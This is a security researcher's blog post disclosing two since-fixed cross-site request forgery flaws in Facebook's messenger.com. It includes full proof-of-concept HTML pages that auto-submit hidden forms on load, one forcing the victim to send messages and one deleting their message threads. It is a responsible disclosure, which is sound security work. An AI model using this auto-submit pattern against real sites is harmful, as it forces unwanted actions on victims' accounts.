Facebook Messenger Multiple CSRF Vulnerabilities

- 3 mins

In this post, I will be demonstrating the findings of multiple interesting cross-site request forgery vulnerabilities that I have identified on Facebook. These vulnerabilities allows an attacker to force the victim to do various actions.

On April 2015, Facebook officially launched messenger.com, a stand-alone Facebook messenger for the web. After hearing about the launch I have started to testing it in my spare time.

Sending Unrestricted Messages to Any User via CSRF

Using this issue, I was able to force any user to send messages to other users without the user’s knowledge.

POC:

<html>
<title>POC @mazen160</title>
<body onload="javascript:document.csrf_form.submit()">
<form name="csrf_form" method="POST" action="https://www.messenger.com/ajax/mercury/send_messages.php">
<input type="hidden" id="message_batch[0][author]" name="message_batch[0][author]" value="fbid:VALUE1">
<input type="hidden" id="message_batch[0][is_filtered_content]" name="message_batch[0][is_filtered_content]" value="false">
<input type="hidden" id="message_batch[0][is_spoof_warning]" name="message_batch[0][is_spoof_warning]" value="false">
<input type="hidden" id="message_batch[0][source]" name="message_batch[0][source]" value="">
<input type="hidden" id="message_batch[0][body]" name="message_batch[0][body]" value="@mazen160">
<input type="hidden" id="message_batch[0][specific_to_list][0]" name="message_batch[0][specific_to_list][0]" value="fbid:VALUE2">
<input type="hidden" id="message_batch[0][specific_to_list][1]" name="message_batch[0][specific_to_list][1]" value="fbid:VALUE1">
<input type="hidden" id="message_batch[0][client_thread_id]" name="message_batch[0][client_thread_id]" value="fbid:VALUE2">
</form>
</body>
</html>

Where:

Deleting Any messages via CSRF

Using this issue, I was able to force any user to delete messaging threads.

PoC:

<html>
<title>POC @mazen160</title>
<body onload="javascript:document.csrf_form.submit()">
<form name="csrf_form" method="POST" action="https://www.messenger.com/ajax/mercury/delete_thread.php">
<input type="hidden" id="ids[0]" name="ids[0]" value="VALUE">
<input type="hidden" id="__user" name="__user" value="">
<input type="hidden" id="__a" name="__a" value="1">
<input type="hidden" id="__dyn" name="__dyn" value="">
<input type="hidden" id="__req" name="__req" value="p">
<input type="hidden" id="fb_dtsg" name="fb_dtsg" value="">
<input type="hidden" id="ttstamp" name="ttstamp" value="">
<input type="hidden" id="__rev" name="__rev" value="">
</form>
</body>
</html>

Change of the value of ids[0] parameter to the victim’s thread ID.

The issues has been fixed very quickly. I would like to thank Facebook security team for their outstanding work in responding to security submissions.

If you need any help securing your web-application or service, you can contact me by E-Mail, or Twitter.

Related Posts

Mazin Ahmed

Mazin Ahmed

Thoughts of a hacker

rss facebook twitter github gitlab youtube mail spotify lastfm instagram linkedin google google-plus pinterest medium vimeo stackoverflow reddit quora quora